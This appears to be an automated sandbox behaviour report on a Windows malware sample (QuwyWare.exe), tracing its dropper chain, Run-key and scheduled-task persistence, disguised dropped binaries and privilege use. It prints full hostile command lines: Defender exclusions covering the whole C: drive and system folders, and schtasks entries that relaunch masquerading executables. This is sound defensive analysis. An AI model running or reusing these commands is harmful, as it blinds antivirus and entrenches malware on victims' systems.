N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files\\Internet Explorer\\en-US\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "\"C:\\Program Files\\Internet Explorer\\en-US\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\conhost.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\conhost.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSCD632E12AB0041D0975A814584C955D9.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\vlmvdx.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\Temp\e978f868350d50 C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files\Internet Explorer\en-US\powershell.exe C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files\Internet Explorer\en-US\e978f868350d50 C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files (x86)\Google\Temp\powershell.exe C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2768 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 2768 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 2768 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 2768 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 2768 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 2768 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 2768 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 2768 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 2676 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 2676 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 2676 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 2676 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 2584 wrote to memory of 2012 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2012 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2012 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2012 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2012 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 2012 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 2012 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 2012 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 3012 wrote to memory of 2900 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2900 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2900 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1892 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1892 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1892 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2020 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2020 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2020 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1844 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1844 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1844 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2440 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2440 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2440 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2872 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2872 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2872 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1928 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1928 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1928 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1068 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1068 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1068 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 3040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 3040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 3040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2072 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3012 wrote to memory of 2072 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3012 wrote to memory of 2072 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2072 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2072 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe

"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"

C:\Users\Admin\AppData\Local\Temp\hwid.exe

"C:\Users\Admin\AppData\Local\Temp\hwid.exe"

C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe

"C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\comServerRefcrtNet\mqTOHq8aHZClYn48E.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\comServerRefcrtNet\lnxvZRavX52Sj8TeqZsoOZAX1b085ZLmiJmz2YXZ5HGWoFSPgyZVlmrEm.bat" "

C:\comServerRefcrtNet\ComsurrogateHost.exe

"C:\comServerRefcrtNet/ComsurrogateHost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\wininit.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bbyzxjhe\bbyzxjhe.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8037.tmp" "c:\Windows\System32\CSCD632E12AB0041D0975A814584C955D9.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\Temp\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Google\Temp\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\en-US\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\en-US\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\conhost.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NzET29XDKR.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe

"C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

